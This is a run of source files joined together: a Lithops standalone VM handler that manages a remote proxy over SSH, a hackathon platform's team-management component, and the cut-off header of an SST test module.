self.backend = StandaloneBackend(self.config[self.backend_name])
except Exception as e:
logger.error("There was an error trying to create the "
"{} standalone backend".format(self.backend_name))
raise e
self.log_monitors = {}
self.ssh_credentials = self.backend.get_ssh_credentials()
self.ip_address = self.backend.get_ip_address()
from lithops.util.ssh_client import SSHClient
self.ssh_client = SSHClient(self.ssh_credentials)
logger.debug("Standalone handler created successfully")
def _is_backend_ready(self):
"""
Checks if the VM instance is ready to receive ssh connections
"""
try:
self.ssh_client.run_remote_command(self.ip_address, 'id', timeout=2)
except Exception:
return False
return True
def _wait_backend_ready(self):
"""
Waits until the VM instance is ready to receive ssh connections
"""
        logger.info('Waiting for the VM instance to become ready')
start = time.time()
while(time.time() - start < self.start_timeout):
if self._is_backend_ready():
return True
time.sleep(1)
self.dismantle()
raise Exception('VM readiness probe expired. Check your VM')
def _start_backend(self):
if not self._is_backend_ready():
# The VM instance is stopped
init_time = time.time()
self.backend.start()
self._wait_backend_ready()
total_start_time = round(time.time()-init_time, 2)
logger.info('VM instance ready in {} seconds'.format(total_start_time))
def _is_proxy_ready(self):
"""
Checks if the proxy is ready to receive http connections
"""
try:
if self.is_lithops_worker:
url = "http://{}:{}/ping".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.get(url, timeout=1, verify=True)
if r.status_code == 200:
return True
return False
else:
cmd = 'curl -X GET http://127.0.0.1:8080/ping'
out = self.ssh_client.run_remote_command(self.ip_address, cmd, timeout=2)
data = json.loads(out)
if data['response'] == 'pong':
return True
except Exception:
return False
def _wait_proxy_ready(self):
"""
Waits until the proxy is ready to receive http connections
"""
        logger.info('Waiting for the Lithops proxy to become ready')
start = time.time()
while(time.time() - start < self.start_timeout):
if self._is_proxy_ready():
return True
time.sleep(1)
self.dismantle()
raise Exception('Proxy readiness probe expired. Check your VM')
def _start_log_monitor(self, executor_id, job_id):
"""
Starts a process that polls the remote log into a local file
"""
job_key = create_job_key(executor_id, job_id)
def log_monitor():
os.makedirs(LOGS_DIR, exist_ok=True)
log_file = os.path.join(LOGS_DIR, job_key+'.log')
fdout_0 = open(log_file, 'wb')
fdout_1 = open(FN_LOG_FILE, 'ab')
ssh_client = self.ssh_client.create_client(self.ip_address)
cmd = 'tail -n +1 -F /tmp/lithops/logs/{}.log'.format(job_key)
stdin, stdout, stderr = ssh_client.exec_command(cmd)
channel = stdout.channel
stdin.close()
channel.shutdown_write()
data = None
while not channel.closed:
try:
readq, _, _ = select.select([channel], [], [], 10)
if readq and readq[0].recv_ready():
data = channel.recv(len(readq[0].in_buffer))
fdout_0.write(data)
fdout_0.flush()
fdout_1.write(data)
fdout_1.flush()
else:
if data:
cmd = 'ls /tmp/lithops/jobs/{}.done'.format(job_key)
_, out, _ = ssh_client.exec_command(cmd)
if out.read().decode().strip():
break
time.sleep(0.5)
except Exception:
pass
if not self.is_lithops_worker:
Thread(target=log_monitor, daemon=True).start()
logger.debug('ExecutorID {} | JobID {} - Remote log monitor '
'started'.format(executor_id, job_id))
def run_job(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
job_key = create_job_key(executor_id, job_id)
log_file = os.path.join(LOGS_DIR, job_key+'.log')
if not self._is_proxy_ready():
# The VM instance is stopped
if not self.log_active:
print('ExecutorID {} - Starting VM instance' .format(executor_id))
init_time = time.time()
self.backend.start()
self._wait_proxy_ready()
total_start_time = round(time.time()-init_time, 2)
logger.info('VM instance ready in {} seconds'.format(total_start_time))
self._start_log_monitor(executor_id, job_id)
logger.info('ExecutorID {} | JobID {} - Running job'
.format(executor_id, job_id))
logger.info("View execution logs at {}".format(log_file))
if self.is_lithops_worker:
url = "http://{}:{}/run".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.post(url, data=json.dumps(job_payload), verify=True)
response = r.json()
else:
cmd = ('curl -X POST http://127.0.0.1:8080/run -d {} '
'-H \'Content-Type: application/json\''
.format(shlex.quote(json.dumps(job_payload))))
out = self.ssh_client.run_remote_command(self.ip_address, cmd)
response = json.loads(out)
return response['activationId']
def create_runtime(self, runtime):
"""
Installs the proxy and extracts the runtime metadata and
preinstalled modules
"""
self._start_backend()
self._setup_proxy()
self._wait_proxy_ready()
logger.info('Extracting runtime metadata information')
payload = {'runtime': runtime}
if self.is_lithops_worker:
url = "http://{}:{}/preinstalls".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.get(url, data=json.dumps(payload), verify=True)
runtime_meta = r.json()
else:
cmd = ('curl http://127.0.0.1:8080/preinstalls -d {} '
'-H \'Content-Type: application/json\' -X GET'
.format(shlex.quote(json.dumps(payload))))
out = self.ssh_client.run_remote_command(self.ip_address, cmd)
runtime_meta = json.loads(out)
return runtime_meta
def get_runtime_key(self, runtime_name):
"""
        Wrapper method that returns a formatted string representing the
        runtime key. Each backend has its own runtime key format. Used to
        store preinstalled modules in the storage.
"""
return self.backend.get_runtime_key(runtime_name)
def dismantle(self):
"""
Stop VM instance
"""
self.backend.stop()
def init(self):
"""
Start the VM instance and initialize runtime
"""
self._start_backend()
# Not sure if mandatory, but sleep several seconds to let proxy server start
time.sleep(2)
# if proxy not started, install it
if not self._is_proxy_ready():
self._setup_proxy()
self._wait_proxy_ready()
def clean(self):
pass
def _setup_proxy(self):
logger.info('Installing Lithops proxy in the VM instance')
logger.debug('Be patient, installation process can take up to 3 minutes '
'if this is the first time you use the VM instance')
service_file = '/etc/systemd/system/{}'.format(PROXY_SERVICE_NAME)
self.ssh_client.upload_data_to_file(self.ip_address, PROXY_SERVICE_FILE, service_file)
cmd = 'rm -R {}; mkdir -p {}; '.format(REMOTE_INSTALL_DIR, REMOTE_INSTALL_DIR)
cmd += 'systemctl daemon-reload; systemctl stop {}; '.format(PROXY_SERVICE_NAME)
self.ssh_client.run_remote_command(self.ip_address, cmd)
config_file = os.path.join(REMOTE_INSTALL_DIR, 'config')
self.ssh_client.upload_data_to_file(self.ip_address, json.dumps(self.config), config_file)
src_proxy = os.path.join(os.path.dirname(__file__), 'proxy.py')
create_handler_zip(FH_ZIP_LOCATION, src_proxy)
self.ssh_client.upload_local_file(self.ip_address, FH_ZIP_LOCATION, '/tmp/lithops_standalone.zip')
os.remove(FH_ZIP_LOCATION)
        # Install dependencies
cmd = 'apt-get update; apt-get install unzip python3-pip -y; '
cmd += 'pip3 install flask gevent pika==0.13.1; '
cmd += 'unzip -o /tmp/lithops_standalone.zip -d {} > /dev/null 2>&1; '.format(REMOTE_INSTALL_DIR)
cmd += 'rm /tmp/lithops_standalone.zip; '
cmd += 'chmod 644 {}; '.format(service_file)
# Start proxy service
cmd += 'systemctl daemon-reload; '
cmd += 'systemctl stop {}; '.format(PROXY_SERVICE_NAME)
cmd += 'systemctl enable {}; '.format(PROXY_SERVICE_NAME)
cmd += 'systemctl start {}; '.format(PROXY_SERVICE_NAME)
self.ssh_client.run_remote_command(self.ip_address, cmd, background=True)
|
team_manager.py
|
# -*- coding: utf-8 -*-
"""
This file is covered by the LICENSING file in the root of this project.
"""
import sys
from werkzeug.exceptions import Forbidden
sys.path.append("..")
import uuid
import time
from flask import g
import threading
from mongoengine import Q, ValidationError
from os.path import realpath, abspath, dirname
from hackathon import Component, RequiredFeature
from hackathon.hmongo.models import Team, TeamMember, TeamScore, TeamWork, Hackathon, UserHackathon, to_dic
from hackathon.hackathon_response import not_found, bad_request, precondition_failed, ok, forbidden
from hackathon.constants import TEAM_MEMBER_STATUS, TEAM_SHOW_TYPE, HACK_USER_TYPE, HACKATHON_CONFIG
__all__ = ["TeamManager"]
hack_manager = RequiredFeature("hackathon_manager")
class TeamManager(Component):
"""Component to manage hackathon teams"""
user_manager = RequiredFeature("user_manager")
admin_manager = RequiredFeature("admin_manager")
register_manager = RequiredFeature("register_manager")
hackathon_template_manager = RequiredFeature("hackathon_template_manager")
def get_team_by_id(self, team_id):
team = self.__get_team_by_id(team_id)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
# TODO: refine: dereference member users is not necessary
return self.__team_detail(team, user)
else:
return not_found()
def get_my_current_team(self, hackathon, user):
team = self.__get_valid_team_by_user(user.id, hackathon.id)
        return self.__team_detail(team, user) if team else not_found(
            "user has no team", friendly_message="Team error, please contact the administrator!")
def get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team_name: str | unicode
:param team_name: name of the team
:rtype: dict
:return: team's information as a dict if team is found otherwise not_found()
"""
team = self.__get_team_by_name(hackathon_id, team_name)
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
if team:
return self.__team_detail(team, user)
else:
return not_found("no such team")
def get_team_members(self, team_id):
"""Get team member list of specific team
:rtype: dict
:return: team's information and team's members list if team is found otherwise not_found()
"""
try:
team = Team.objects(id=team_id).first()
except ValidationError:
return None
if not team:
return None
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
return [sub(t) for t in team.members]
def get_hackathon_team_list(self, hackathon_id, name=None, number=None):
"""Get the team list of selected hackathon
:type hackathon_id: string or object_id
:param hackathon_id: hackathon id
:type name: str|unicode
:param name: name of team. optional
:type number: int
:param number: querying condition, return number of teams
:rtype: list
        :return: a list of teams on the selected hackathon, filtered by name and limited to at most 'number' entries
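        Example (illustrative; 'team_manager' stands for this component instance)::
            teams = team_manager.get_hackathon_team_list(hackathon.id, name="team", number=10)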
"""
query = Q(hackathon=hackathon_id)
if name is not None:
query &= Q(name__icontains=name)
try:
teams = Team.objects(query).order_by('name')[:number]
except ValidationError:
return []
# check whether it's anonymous user or not
user = None
if self.user_manager.validate_login():
user = g.user
def get_team(team):
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
teamDic['works'] = teamDic.get('works', '')
[teamDic.pop(key, None) for key in
['assets', 'azure_keys', 'scores', 'templates', 'hackathon']]
teamDic["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
def sub(t):
m = to_dic(t)
m["user"] = self.user_manager.user_display_info(t.user)
return m
teamDic["members"] = [sub(t) for t in team.members]
return teamDic
return [get_team(x) for x in teams]
def create_default_team(self, hackathon, user):
"""Create a default new team for user after registration.
Use user name as team name by default. Append user id in case user name is duplicate
"""
user_team = self.__get_valid_team_by_user(user.id, hackathon.id)
if user_team:
self.log.debug("fail to create team since user is already in some team.")
return precondition_failed("you must leave the current team first")
team_name = self.__generate_team_name(hackathon, user)
team_member = TeamMember(join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.APPROVED,
user=user)
team = Team(name=team_name,
leader=user,
logo=user.avatar_url,
hackathon=hackathon,
members=[team_member])
team.save()
return team.dic()
def update_team(self, kwargs):
"""Update existing team information
:type kwargs: dict
:param kwargs: a dict to store update information for team
:rtype: dict
:return: updated team information in a dict
"""
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
# avoid duplicate team with same names
if "name" in kwargs and kwargs["name"] != team.name:
if self.__get_team_by_name(g.hackathon.id, kwargs["name"]):
return precondition_failed("team with the same name exists already")
self.__validate_team_permission(g.hackathon.id, team, g.user)
# hackathon.modify(**update_items)
# team.name = kwargs.get("name", team.name)
# team.description = kwargs.get("description", team.description)
# team.logo = kwargs.get("logo", team.logo)
kwargs.pop('id', None) # id should not be included
team.modify(**kwargs)
team.update_time = self.util.get_now()
team.save()
if "dev_plan" in kwargs and kwargs["dev_plan"] and not kwargs["dev_plan"] == "" \
and team.hackathon.config.get(HACKATHON_CONFIG.DEV_PLAN_REQUIRED, False):
t = threading.Thread(target=self.__email_notify_dev_plan_submitted, args=(team,))
t.setDaemon(True)
t.start()
return self.__team_detail(team)
def dismiss_team(self, operator, team_id):
"""Dismiss a team by team leader or hackathon admin
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return ok()
hackathon = team.hackathon
self.__validate_team_permission(hackathon.id, team, operator)
members = team.members
member_users = [m.user for m in members]
        # TODO: transaction?
team.delete()
for u in member_users:
self.create_default_team(hackathon, u)
return ok()
def quit_team_forcedly(self, team, user):
"""
The operator(admin or superadmin) forces a user(team leader or other members) to quit a team.
If the user is the only member of the team, the team will be deleted.
Else if the user is the leader of a team with several members, the team will be decomposed into several
new teams.
Else if the user is not the leader of a team with several members, just the user quits the team.
:rtype: bool
:return: if dismiss success, return ok. if not ,return bad request.
"""
# here we don't check whether the operator has the permission,
if not team.members or len(team.members) == 0:
self.log.warn("this team doesn't have any members")
return ok()
member_users = [m.user for m in team.members if m.status == TEAM_MEMBER_STATUS.APPROVED]
num_team_members = len(member_users)
hackathon = team.hackathon
if num_team_members > 1:
if team.leader == user:
team.delete()
for u in member_users:
if u.id != user.id:
self.create_default_team(hackathon, u)
else:
Team.objects(id=team.id).update_one(pull__members__user=user)
else:
# num_team_members == 1
team.delete()
return ok()
def join_team(self, user, team_id):
"""Join a team will create a record on user_team_rel table which status will be 0.
:type user: User
:rtype: dict
:return: if user already joined team or team not exist, return bad request. Else, return a dict of joined
details.
"""
if Team.objects(id=team_id, members__user=user.id).count():
return ok("You already joined this team.")
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
cur_team = self.__get_valid_team_by_user(user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
if not self.register_manager.is_user_registered(user.id, team.hackathon):
return precondition_failed("user not registerd")
mem = TeamMember(
join_time=self.util.get_now(),
status=TEAM_MEMBER_STATUS.INIT,
user=user)
team.members.append(mem)
team.save()
return to_dic(mem)
def update_team_member_status(self, operator, team_id, user_id, status):
""" update user's status on selected team. if current user doesn't have permission, return bad request.
Else, update user's status
:type status: int
:param status: the status of the team member, see TEAM_MEMBER_STATUS in constants.py
:rtype: bool
:return: if the update succeeds, return ok; if not, return bad request.
"""
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
mem = filter(lambda x: str(x.user.id) == user_id, team.members)
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
# #NOTE1# we have to re-check this here
# because of this situation:
# A is in a single-person team TeamA, and request join TeamB
# after that, C join TeamA and now TeamA has two members,
# this is not allowed when status == TEAM_MEMBER_STATUS.APPROVED
cur_team = self.__get_valid_team_by_user(mem.user.id, team.hackathon.id)
if cur_team and cur_team.members.count() > 1:
return precondition_failed("Team leader cannot join another team for team member count greater than 1")
self.__validate_team_permission(team.hackathon.id, team, operator)
if mem.user.id == team.leader.id:
return precondition_failed("cannot update status of team leader")
if status == TEAM_MEMBER_STATUS.APPROVED:
# disable previous team first
# NOTE:
# Do we also have to delete status that is not TEAM_MEMBER_STATUS.APPROVED?
# i.e., if A request join both TeamB and TeamC, TeamC approve join first, then TeamB approved,
# this will cause A leave TeamB and join TeamC.
# is this the desired behaviour?
Team.objects(hackathon=team.hackathon.id).update(__raw__={
"$pull": {
"members": {
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}}})
# because only a team leader whose team has a single member can make a join request,
# we don't have to create default teams for the other members of this team.
# the check at #NOTE1# guarantees this is always true
Team.objects(hackathon=team.hackathon.id, leader=mem.user.id).delete()
mem.status = TEAM_MEMBER_STATUS.APPROVED
mem.update_time = self.util.get_now()
team.save()
return ok("approved")
if status == TEAM_MEMBER_STATUS.DENIED:
user = mem.user
hackathon = team.hackathon
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok("Your request has been denied, please rejoin another team.")
def kick_or_leave(self, operator, team_id, user_id):
try:
team = Team.objects(id=team_id, members__user=user_id).first()
except ValidationError:
return not_found()
if not team:
return not_found()
mem = filter(lambda x: str(x.user.id) == user_id, team.members)
assert len(mem) < 2
if not mem:
return not_found()
mem = mem[0]
hackathon = team.hackathon
user = mem.user
if str(team.leader.id) == user_id: # if the user leaving or being kicked is the team leader
return precondition_failed("leader cannot leave team")
if str(operator.id) == user_id: # leave team
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
else: # kick somebody else
self.__validate_team_permission(hackathon.id, team, operator)
team.members.remove(mem)
team.save()
self.create_default_team(hackathon, user)
return ok()
def add_template_for_team(self, args):
"""Add template to team of the current user by template name
template_id must be included in args. The current login user must be in a team and must be its leader
"""
if "template_id" not in args:
return bad_request("template id invalid")
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.add_template_to_hackathon(args["template_id"])
def delete_template_from_team(self, template_id):
"""Delete template from current user's team
Team should exist and current login user must be the leader
"""
team = self.__get_valid_team_by_user(g.user.id, g.hackathon.id)
if not team:
return precondition_failed("you don't join any team so you cannot add teamplate")
if team.leader.id != g.user.id:
return forbidden("team leader required")
else:
return self.hackathon_template_manager.delete_template_from_hackathon(template_id)
def get_team_by_user_and_hackathon(self, user, hackathon):
team = Team.objects(hackathon=hackathon, members__user=user).first()
return team
def score_team(self, judge, ctx):
team = self.__get_team_by_id(ctx.team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, judge.id):
return forbidden()
score = filter(lambda x: x.judge.id == judge.id, team.scores)
assert len(score) < 2
if score:
score = score[0]
score.score = ctx.score
score.reason = ctx.get("reason")
score.update_time = self.util.get_now()
else:
score = TeamScore(
score=ctx.score,
judge=judge,
reason=ctx.get("reason"))
team.scores.append(score)
team.save()
return self.__response_get_score(judge, team.scores)
def get_score(self, user, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found("team not found")
if not self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id):
return {}
return self.__response_get_score(user, team.scores)
def __response_get_score(self, user, scores):
resp = {
"all": [to_dic(s) for s in scores]}
my = filter(lambda sc: sc.judge.id == user.id, scores)
assert len(my) < 2
if my:
resp["my"] = to_dic(my[0])
return resp
def add_team_show(self, user, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found()
self.__validate_team_permission(team.hackathon.id, team, user)
try:
work = TeamWork(
id=uuid.uuid1(),
description=context.get("note"),
type=context.type,
uri=context.uri)
team.works.append(work)
team.save()
except ValidationError as e:
if "uri" in e.message:
return bad_request("`uri` field must be in uri format")
else:
raise e
return to_dic(work)
def delete_team_show(self, user, show_id):
try:
team = Team.objects(works__id=show_id).first()
except (ValidationError, ValueError):
return not_found("wrong id format")
if team:
self.__validate_team_permission(team.hackathon.id, team, user)
for i in xrange(len(team.works)):
if str(team.works[i].id) == show_id:
team.works.pop(i)
team.save()
break
return ok()
def get_team_show_list(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
return [to_dic(s) for s in team.works]
def get_hackathon_show_list(self, hackathon_id, show_type=None, limit=6):
query = Q(hackathon=hackathon_id)
if show_type is not None:
query &= Q(works__type=int(show_type))
works = []
for team in Team.objects(query).filter(works__1__exists=True).order_by('update_time', '-age')[:limit]:
teamDic = team.dic()
teamDic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
teamDic['cover'] = teamDic.get('cover', '')
teamDic['project_name'] = teamDic.get('project_name', '')
teamDic['dev_plan'] = teamDic.get('dev_plan', '')
[teamDic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
#
# teamDic['works'] = []
#
# for work in team.works:
# teamDic['works'].append(to_dic(work))
works.append(teamDic)
# works.sort(lambda a, b: int(b["create_time"] - a["create_time"]))
# def proc_work(w):
# w.pop("create_time")
# w["id"] = str(w["id"])
# w["team_id"] = str(w["team_id"])
# w["hackathon_id"] = str(w["hackathon_id"])
# return w
return works
def get_team_show_list_by_user(self, user_id):
teams = Team.objects(members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).all()
def get_team_show_detail(team):
dic = self.__team_detail(team)
dic["hackathon"] = team.hackathon.dic()
return dic
return [get_team_show_detail(team) for team in teams if not len(team.works) == 0]
def get_team_source_code(self, team_id):
try:
team = Team.objects(id=team_id, works__type=TEAM_SHOW_TYPE.SOURCE_CODE)
except ValidationError:
return None
if not team:
return None
return filter(lambda w: w.type == TEAM_SHOW_TYPE.SOURCE_CODE, team.works)[0]
def query_team_awards(self, team_id):
team = self.__get_team_by_id(team_id)
if not team:
return []
awards = [self.__award_with_detail(r, hackathon=team.hackathon) for r in team.awards]
awards.sort(lambda a, b: b["level"] - a["level"])
return awards
def get_granted_awards(self, hackathon):
awards = []
team_id_with_awards = []
for team in Team.objects(hackathon=hackathon):
awards += team.awards
if not len(team.awards) == 0:
team_id_with_awards.append(team.id)
awards = [self.__award_with_detail(r) for r in awards]
awards.sort(lambda a, b: b["level"] - a["level"])
# find teams who are granted these awards
for award in awards:
award["team"] = []
for team_id in team_id_with_awards:
team = Team.objects(id=team_id).first()
if uuid.UUID(award["id"]) in team.awards:
award["team"].append(team.dic())
# len(awards) equals the total number of awards granted, so the list may contain duplicates; duplicated items are removed in JS.
return awards
def get_all_granted_awards(self, limit):
teams = Team.objects().all()
teams_with_awards = [team for team in teams if not team.awards == []]
teams_with_awards.sort(key=lambda t: (
t.hackathon.id,
Hackathon.objects(id=t.hackathon.id, awards__id=t.awards[0]).first().awards.get(id=t.awards[0]).level
), reverse=True) # sort by hackathon and then sort by award level.
teams_with_awards = teams_with_awards[0: int(limit)]
return [self.__get_hackathon_and_show_detail(team) for team in teams_with_awards]
def grant_award_to_team(self, hackathon, context):
team = self.__get_team_by_id(context.team_id)
if not team:
return not_found("team not found")
award = filter(lambda a: str(a.id) == context.award_id, hackathon.awards)
assert len(award) < 2
if not award:
return not_found("award not found")
award = award[0]
if team.hackathon.id != hackathon.id:
return precondition_failed("hackathon doesn't match")
team_award = filter(lambda a: str(a) == context.award_id, team.awards)
assert len(team_award) < 2
if not team_award:
team.awards.append(uuid.UUID(context.award_id))
team.save()
return self.__award_with_detail(context.award_id)
def cancel_team_award(self, hackathon, team_id, award_id):
team = self.__get_team_by_id(team_id)
if not team:
return not_found()
for award in team.awards:
if str(award) == award_id:
team.awards.remove(award)
team.save()
break
return ok()
def send_email_azure(self, kwargs):
# team information
team = self.__get_team_by_id(kwargs["id"])
if not team:
return not_found("team not exists")
azure = team.azure
if not azure.strip():
if Azure.objects(status="0").count() == 0:
return ok("请联系管理员.")
azure_info = Azure.objects(status="0").first()
else:
azure_info = Azure.objects(account=azure).first()
if not azure_info:
return ok("请联系管理员!")
primary_emails = []
for i in xrange(0, len(team.members)):
mem = team.members[i]
resp = self.user_manager.user_display_info(mem.user)
primary_emails.append(resp['emails'][0]['email'])
Azure.objects(account=azure_info.account).update_one(status="1")
Team.objects(id=team.id).update_one(azure=azure_info.account)
sender = ''
email_title = ''
email_content = ''
return self.util.send_emails(sender, primary_emails, email_title, email_content)
def __init__(self):
pass
def __award_with_detail(self, team_award, hackathon=None):
if not hackathon:
hackathon = g.hackathon
try:
award = filter(lambda a: str(a.id) == str(team_award), hackathon.awards)[0]
except IndexError:
return None
return to_dic(award)
def __team_detail(self, team, user=None):
resp = team.dic()
resp["leader"] = self.user_manager.user_display_info(team.leader)
resp["member_count"] = team.members.filter(status=TEAM_MEMBER_STATUS.APPROVED).count()
# all team action not allowed if frozen
resp["is_frozen"] = False
for i in xrange(0, len(team.members)):
mem = team.members[i]
resp["members"][i]["user"] = self.user_manager.user_display_info(mem.user)
if user:
resp["is_admin"] = self.admin_manager.is_hackathon_admin(team.hackathon.id, user.id)
resp["is_leader"] = team.leader == user
rel = team.members.filter(user=user)
resp["is_member"] = True if not rel == [] else False
return resp
def __generate_team_name(self, hackathon, user):
"""Generate a default team name by user name. It can be updated later by team leader"""
team_name = user.name
if Team.objects(hackathon=hackathon, name=team_name).first():
team_name = "%s (%s)" % (user.name, user.id)
return team_name
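# --- Illustrative sketch (not part of the manager class) --------------------
# __generate_team_name falls back to "user name (user id)" when the plain user
# name is already taken inside the hackathon. The same rule as a stand-alone
# helper, using a set of existing names instead of the Mongo query (the set is
# an assumption made only for illustration):
def _generate_team_name_example(existing_names, user_name, user_id):
    candidate = user_name
    if candidate in existing_names:
        candidate = "%s (%s)" % (user_name, user_id)
    return candidate

# _generate_team_name_example({"alice"}, "alice", "42") -> "alice (42)"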
def __get_user_teams(self, user_id):
"""Get all teams of specific and related hackathon display info
:type user_id: int
:param user_id: User id to get teams. Cannot be None
:rtype: list
:return: list of all teams as well as hackathon info
"""
return Team.objects(members__user=user_id).all()
def __get_team_by_id(self, team_id):
"""Get team by its primary key"""
try:
return Team.objects(id=team_id).first()
except ValidationError:
return None
def __get_valid_team_by_user(self, user_id, hackathon_id):
"""Get valid Team(Mongo-document) by user and hackathon
"valid" means user is approved. There might be other records where status=Init
Since foreign keys are defined in Team, one can access team or user through the return result directly
:rtype: Team
:return instance of Team
"""
return Team.objects(
hackathon=hackathon_id,
members__match={
"user": user_id,
"status": TEAM_MEMBER_STATUS.APPROVED}).first()
def __get_team_by_name(self, hackathon_id, team_name):
""" get user's team basic information stored on table 'team' based on team name
:type hackathon_id: int
:param hackathon_id: hackathon id for the team
:type team_name: str|unicode
:param team_name: name of the team
:rtype: Team
:return: instance of Team if team found otherwise None
"""
try:
return Team.objects(hackathon=hackathon_id, name=team_name).first()
except ValidationError:
return None
def __validate_team_permission(self, hackathon_id, team, user):
"""Validate current login user whether has proper right on specific team.
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team: Team
:param team: team to be checked
:type user: User
:param user: current login user
:raise: Forbidden if user is neither team leader, hackathon admin nor super admin
"""
self.log.debug(
"validate team permission on hackathon %s and team %s for user %s" % (hackathon_id, team.name, user.id))
# check if team leader
if team.leader.id != user.id:
# check if hackathon admin
if not self.admin_manager.is_hackathon_admin(hackathon_id, user.id):
# super permission is already checked in admin_manager.is_hackathon_admin
self.log.debug("Access denied for user [%s]%s trying to access team '%s' of hackathon %s " %
(user.id, user.name, team, hackathon_id))
raise Forbidden(description="You don't have permission on team '%s'" % team.name)
return
def __get_hackathon_and_show_detail(self, team):
team_dic = team.dic()
team_dic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
team_dic['cover'] = team_dic.get('cover', '')
team_dic['project_name'] = team_dic.get('project_name', '')
team_dic['dev_plan'] = team_dic.get('dev_plan', '')
[team_dic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
team_dic["hackathon"] = hack_manager.get_hackathon_detail(team.hackathon)
return team_dic
def __email_notify_dev_plan_submitted(self, team):
# send emails to all admins of this hackathon when one team dev plan is submitted.
admins = UserHackathon.objects(hackathon=team.hackathon, role=HACK_USER_TYPE.ADMIN).distinct("user")
email_title = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.title", None)
file_name = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.default_file_name", None)
sender = self.util.safe_get_config("email.default_sender", "")
# todo remove receivers_forced
receivers_forced = self.util.safe_get_config("email.receivers_forced", [])
try:
if email_title and file_name:
path = abspath("%s/.." % dirname(realpath(__file__)))
f = open(path + "/resources/email/" + file_name, "r")
email_content = f.read()
email_title = email_title % (team.name.encode("utf-8"))
email_content = email_content.replace("{{team_name}}", team.name.encode("utf-8"))
email_content = email_content.replace("{{team_id}}", str(team.id))
email_content = email_content.replace("{{hackathon_name}}", team.hackathon.name.encode("utf-8"))
f.close()
else:
self.log.error("send email_notification (dev_plan_submitted_event) fails: please check the config")
return False
except Exception as e:
self.log.error(e)
return False
# isNotified: whether at least one admin has been notified by emails.
isNotified = False
for admin in admins:
isSent = False
primary_emails = [email.email for email in admin.emails if email.primary_email]
nonprimary_emails = [email.email for email in admin.emails if not email.primary_email]
# send notification to all primary-mailboxes.
if not len(primary_emails) == 0:
isSent = self.util.send_emails(sender, primary_emails, email_title, email_content)
# if sending to the primary mailboxes fails, send the email to one of the non-primary mailboxes.
if not isSent and not len(nonprimary_emails) == 0:
for nonpri_email in nonprimary_emails:
if self.util.send_emails(sender, [nonpri_email], email_title, email_content):
isSent = True
break
isNotified = isNotified or isSent
# todo remove this code
self.util.send_emails(sender, receivers_forced, email_title, email_content)
self.log.debug(team.name + ": dev_plan email notification result: " + str(isNotified))
return isNotified
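# --- Illustrative sketch (not part of the manager class) --------------------
# The notification above fills an email template by plain string replacement
# and then tries the primary mailboxes first, falling back to one of the
# non-primary mailboxes only if that fails. A condensed, self-contained
# version of that flow (send_fn stands in for util.send_emails and is an
# assumption, not the real helper):
def _notify_with_fallback(send_fn, sender, title, template, context,
                          primary_emails, other_emails):
    body = template
    for key, value in context.items():
        body = body.replace("{{%s}}" % key, value)
    if primary_emails and send_fn(sender, primary_emails, title, body):
        return True
    for address in other_emails:
        if send_fn(sender, [address], title, body):
            return True
    return False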
|
test_engine_unittest.py
|
# -*- coding: utf-8 -*-
## Copyright 2009-2022 NTESS. Under the terms
## of Contract DE-NA0003525 with NTESS, the U.S.
## Government retains certain rights in this software.
##
## Copyright (c) 2009-2022, NTESS
## All rights reserved.
##
## This file is part of the SST software package. For license
## information, see the LICENSE file in the top level directory of the
## distribution.
""" This module is the derived python unittest and testtools classes to support
the requirements for SST Testing.
"""
import sys
import unittest
import traceback
import threading
import time
from datetime import datetime
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY3_4_Plus = sys.version_info[1] >= 4
################################################################################
def check_module_conditional_import(module_name):
""" Test to see if we can import a module
